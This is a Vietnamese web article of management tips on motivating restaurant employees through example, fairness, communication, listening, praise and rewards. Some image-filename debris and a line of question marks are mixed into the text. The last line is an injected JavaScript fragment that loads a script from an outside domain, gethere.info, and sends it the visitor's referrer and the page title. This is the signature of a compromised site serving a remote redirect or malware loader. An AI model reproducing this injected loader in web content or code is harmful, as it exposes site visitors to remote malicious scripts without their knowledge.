7 cách giúp nhân viên nhà hàng trở nên năng động

Sẽ thật dễ dàng nếu như nghĩ những sản phẩm bạn tạo ra chỉ như một loại hàng hóa bạn đem đi bán hàng nhưng trên thực tế đó lại chính là dịch vụ bạn trao cho khách hàng của mình. Những món ăn ngon nhất không thể được chế biến bởi một trạng thái bất mãn về một vấn đề nào đó. Đó chính là thái độ làm việc của nhân viên trong nhà hàng.

7-cach-tao-dong-luc-chi-nhan-vien-nha-hang (6)

Không phải nhân viên nào cũng có động cơ làm việc là vì niềm yêu thích nghề, muốn đem khả năng của mình đến cho khách hàng, có đến 80 – 90 % họ làm việc vì tiền, vấn đề tài chính. Là một quản lý nhà hàng, bạn cần nắm bắt được suy nghĩ của nhân viên, từ đó điều hướng suy nghĩ của họ, giúp họ trở nên năng động, nhiệt huyết hơn với công việc. Công việc của một lãnh đạo quan trọng là làm sao giữ cho nguồn lực trên “con tàu” của bạn luôn ổn định để đảm bảo chất lượng dịch vụ tốt nhất.

Xem những 7 cách dưới đây để giúp tạo động lực cho nhân viên trong nhà hàng của bạn:

#1 Hãy chỉ đạo bằng những ví dụ thực tế

7-cach-tao-dong-luc-chi-nhan-vien-nha-hang (3)

Hãy ném cái biển quản lý nhà hàng của bạn sang một bên, mặc tạp dề vào và chứng tỏ cho nhân viên của mình thấy được rằng bạn cũng có khả năng làm những công việc họ đang làm. Khi ông chủ cho thấy việc cắt hành tây trở nên quá tầm thường, hay việc nướng một miếng thăn bò đúng cách sẽ là một thông điệp bằng hành động gửi đến những ai nhìn thấy bạn mà chẳng cần phải nói bằng lời: “Đừng ngại ngần làm bất cứ công việc gì, việc tôi làm được cũng là những việc các bạn có thể làm, bạn hãy làm theo những gì tôi làm và tôi có thể giúp đỡ bạn”.

#2 Đối xử công bằng

Print

Bạn phải cho nhân viên cấp dưới thấy được sự nhất quán trong cách đối xử của bạn với mọi người. Đừng bao giờ đối xử với khách hàng một cách tử tế nhưng sau đó lại quay sang nhân viên mắng mỏ, hách dịch. Điều đó làm xấu hình ảnh của bạn trong mắt nhân viên của mình. Hãy đối xử với họ một cách công bằng nhưng vẫn phải giữ được tinh thần của người lãnh đạo để tiếng nói của bạn trong một số trường hợp phát huy tác dụng.

#3 Giao tiếp xuất sắc

Bạn là ai đồng nghĩa với việc những gì mà nhà hàng của bạn sẽ nhận được là gì. Hãy chia sẻ tầm nhìn của bạn với mọi người hoặc môt tuyên bố nhiệm vụ dành cho nhân viên cấp dưới để tất cả cùng hành động vì mục đích chung và có thể hỗ trợ lẫn nhau. Trong phần mô tả đó sẽ cần bao gồm kỳ vọng của bạn dành cho họ. Đồng thời trong quá trình làm việc hãy chú ý đến họ hơn, dành chút thời gian hỏi han xem họ có gặp vấn đề gì khó khăn hay không. Những trao đổi nhỏ từ quản lý có tác động cực lớn đến suy nghĩ và hành động của bất cứ nhân viên nào.

#4 Lắng nghe

??????????????????????????????????????????????????????????

Hầu hết chủ nhà hàng đều quản lý những công việc bên trong nhà hàng một cách dễ dàng nhưng có một điều đối với nhiều người lại trở thành rào cản, khó khăn lớn đó là lắng nghe những nỗi thất vọng của nhân viên, những đề xuất, ý kiến cá nhân của họ. Hãy giúp cho nhân viên của bạn về trạng thái tinh thần cân bằng với những gì họ còn đang khúc mắc, có thể là công việc, cuộc sống cá nhân. Hãy nhớ lại những lần trong cuộc sống của bạn khi bạn cảm thấy tốt hơn nếu được nói ra điều gì đó.

#5 Tạo một môi trường thực

Với nhiều người, thời gian làm việc trong ngành công nghiệp thực phẩm hay dịch vụ này chỉ như là những trải nghiệm và rồi nó cũng sẽ trở thành kỉ niệm. Họ là sinh viên, các bà nội trợ và người về hưu,…Bạn hãy xây dựng một bảng thành tích cho từng nhân viên, đối với họ đó thực sự giá trị. Hãy để cho họ thấy rằng bạn còn nhìn thấy điều gì ở họ ngoài công việc trong nhà hàng. Đó sẽ là một sự cảm kích lớn với mỗi nhân viên.

#6 Hào phóng với lời khen ngợi

7-cach-tao-dong-luc-chi-nhan-vien-nha-hang (4)

Con đường ngắn nhất đi đến trái tim của nhân viên là khen ngợi họ, đặc biệt là trước mặt những nhân viên khác. Những lời khen đúng lúc, đúng chỗ luôn có tác động tích cực đến suy nghĩ của người khác, hơn nữa lại từ một người có cấp vị cao hơn. Từ những lời khen đó, họ sẽ có động lực hơn trong công việc.

#7 Chế độ thưởng

7-cach-tao-dong-luc-chi-nhan-vien-nha-hang (1)

Khen ngợi là điều cần thiết trong một môi trường làm việc nhưng nếu cứ khen mãi thì lời nó đó sẽ trở nên vô giá trị. Bạn cần đan xen phần thưởng cùng những lời nó “có cánh” như một hình thích thúc đẩy tinh thần của nhân viên. Đó có thể chỉ là tặng cho nhân viên một phần quà nhò trong nhà hàng, một số tiền động viên hoặc những ngày nghỉ phép dài. Điều đó sẽ thực tế hơn nhiều. Nhân viên của bạn theo thời gian sẽ nhận ra những giá trị của phần thường đi kèm lời khen này, coi đó như một sự công nhận năng lực.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;